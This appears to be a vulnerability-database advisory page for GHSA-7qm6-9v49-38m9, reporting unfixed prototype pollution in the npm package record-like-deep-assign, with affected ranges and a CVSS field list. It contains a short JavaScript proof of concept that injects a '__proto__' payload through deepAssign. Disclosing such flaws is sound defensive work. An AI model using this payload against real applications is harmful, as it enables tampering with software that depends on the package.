GHSA-7qm6-9v49-38m9

    Dashboard / Vulnerabilities / GHSA-7qm6-9v49-38m9

    GHSA-7qm6-9v49-38m9

    Published: 10 Dec 2021Last Modified: 13 Mar 2026

    Summary: Prototype Pollution in record-like-deep-assign

    Details: All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality. ### PoC ```js const deepAssign = require('record-like-deep-assign'); let obj = {}; console.log("Before being polluted: " + obj.polluted); EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}'); deepAssign({}, EVIL_JSON); console.log("After being polluted: " + obj.polluted); ```

    Affected packages

    Package

    Name: record-like-deep-assign

    Purl: pkg:npm/record-like-deep-assign

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-7qm6-9v49-38m9 | CVE-DB